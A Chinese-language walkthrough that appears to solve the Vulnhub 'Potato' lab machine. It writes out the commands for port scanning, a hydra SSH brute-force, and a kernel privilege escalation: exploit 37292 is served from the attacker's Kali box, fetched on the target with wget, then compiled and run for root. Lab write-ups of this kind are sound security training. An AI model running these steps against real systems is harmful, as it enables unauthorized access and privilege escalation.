信息搜集
设备发现
扫描端口
综合扫描
开放了80端口的HTTP服务和7120端口的SSH服务
目录扫描
扫描目录
看看这个info.php,发现只有php的版本信息,没有可以利用的注入点
SSH突破
hydra 爆破
考虑到 7120 端口是 ssh 服务,尝试利用 hydra 进行 ssh 爆破,得到用户名:potato 密码:letmein
hydra -l potato -P top1000.txt -V ssh://192.168.88.138:7120
ssh渗透提权
用拿到 ssh 用户名和密码,登录 ssh
id查看发现是一个普通用户;uname -a查看发现ubuntu的版本很老,只有3.13.0
查看 Linux 内核信息,搜索后发现存在 exp,也可以searchsploit ubuntu 3.13.3,使用第一个漏洞进行攻击
使用该漏洞,
将漏洞传到靶机上,这里我们在kali上建立apache服务器,让目标主机通过网络将漏洞下载到本机上
service apache2 start ---------开启服务器
ss -tunlp ----------查看开启端口
将漏洞下载到服务器目录下
cd /var/www/html
searchsploit -m 37292 
使用目标靶机下载服务器上的漏洞
wget http://192.168.88.128/37292.c 运行脚本提权
gcc 37292.c -o exp ----------编译脚本
chmod +777 exp -----------更改权限
./exp -------------执行脚本
提高交互性并且拿到root权限
找到flag,拿下
参考博客:
Potato靶机测试-CSDN博客
Vulnhub靶机实战-POTATO-WP_维梓-的博客-CSDN博客
